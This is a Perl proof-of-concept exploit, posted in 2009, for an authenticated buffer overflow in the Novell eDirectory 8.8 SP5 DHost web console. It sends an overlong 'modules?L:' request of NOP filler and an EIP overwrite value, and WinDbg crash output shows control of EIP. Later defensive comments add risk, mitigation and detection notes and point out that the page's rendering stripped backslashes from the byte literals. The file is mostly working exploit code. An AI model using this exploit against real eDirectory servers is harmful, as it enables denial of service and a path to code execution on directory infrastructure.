Posted on 26 October 2009

#!/usr/bin/perl
#PoC for Vulnerability:
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs
#
# What this script does (reading it as a defender):
#   1. Logs in to the eDirectory DHost web console at $target/_LOGIN_SERVER_
#      with a valid account (HTML form "authenticator", fields usr / pwd).
#   2. Requests $target/dhost/modules?L:<long string>.
# The WinDbg transcript at the bottom shows dhost.exe first faulting inside
# MSVCR80!vfwprintf_p on "mov byte ptr [edx],al" with al=0x42 ('B', the $data
# filler) and edx at an unmapped page boundary (038b0000=??), i.e. a formatted
# write runs past its buffer; after continuing, EIP=deadbeef, the value of $eip.
# Risk: any account that can log in to the DHost console can crash the
# directory service process and control EIP. The request is authenticated, so
# credentials are a precondition, not a bypass.
# Mitigation: check for a vendor fix for 8.8 SP5 and limit who can reach the
# DHost HTTP console (management network / host filtering).
# Detection: unusually long "L:" values in requests to /dhost/modules in the
# DHost HTTP logs or on the wire.
#
# NOTE(review): backslashes were stripped when this page was rendered (compare
# the Windows paths in the debugger output, e.g. "C:Windowssystem32"), so the
# "x90"/"xef..." string literals and the print strings below are reproduced
# exactly as they appear on the page, not repaired.
use WWW::Mechanize;
use LWP::Debug qw(+);                  # "+" enables all LWP debug output: every request and response is logged
use HTTP::Cookies;

$target=$ARGV[0];                      # base URL of the DHost console, taken unvalidated from the command line
if(!$ARGV[0]){
    print "Novell eDirectory 8.8 SP5 Exploit ";
    print "Hellcode Research || Hellcode.net ";
    print "Usage:perl $0 [target] ";
    exit();
}
$login_url = "$target/_LOGIN_SERVER_";
$url = "$target/dhost/";
$vuln = "modules?L:";                  # the request parameter whose value is overlong
$nop = "x90" x 1668;                   # 1668 repetitions of the (mangled, see NOTE) literal
$eip = "xefxbexadxde";                 # intended little-endian 0xdeadbeef; matches EIP in the final crash
$data = "B" x 235;                     # 0x42 filler; matches EAX=00000042 at the first fault
$hellcode = $vuln.$nop.$eip.$data;
########Write your usr and pwd########
$username = "Admin.context";           # placeholder: a real DHost login is required for the request to reach the bug
$password = "1234";
my $mechanize = WWW::Mechanize->new();
# $cookie_file and $url_timeout are never assigned anywhere in this file; with
# no "use strict" this silently passes an empty cookie-file name and an undef timeout.
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));  # fetch the login page so the form can be submitted
$mechanize->submit_form( form_name => "authenticator", fields => { usr => $username, pwd => $password}, button => 'Login');
$response2 = $mechanize->get("$url$hellcode");   # the overlong modules?L: request
##Debugger Results of PoC: Windbg- File>Attach to a process>dhost.exe
#eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000
#eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#77867dfe cc int 3
#0:088> g
#Debuggee is running...
##C:UsersDELLVideoskarak0rsanPerlin>perl novelbof.pl
##Debugger Results after running poc:
#(1cc.1d44): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878
#eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll -
#MSVCR80!vfwprintf_p+0x5b:
#75c11684 8802 mov byte ptr [edx],al ds:0023:038b0000=??
#-- EAX = 00000042 (writed a part of eax)
##0:010> g
#(8e4.bb4): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000
#eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#deadbeef ?? ???
#EIP=deadbeef - We controled eip ;)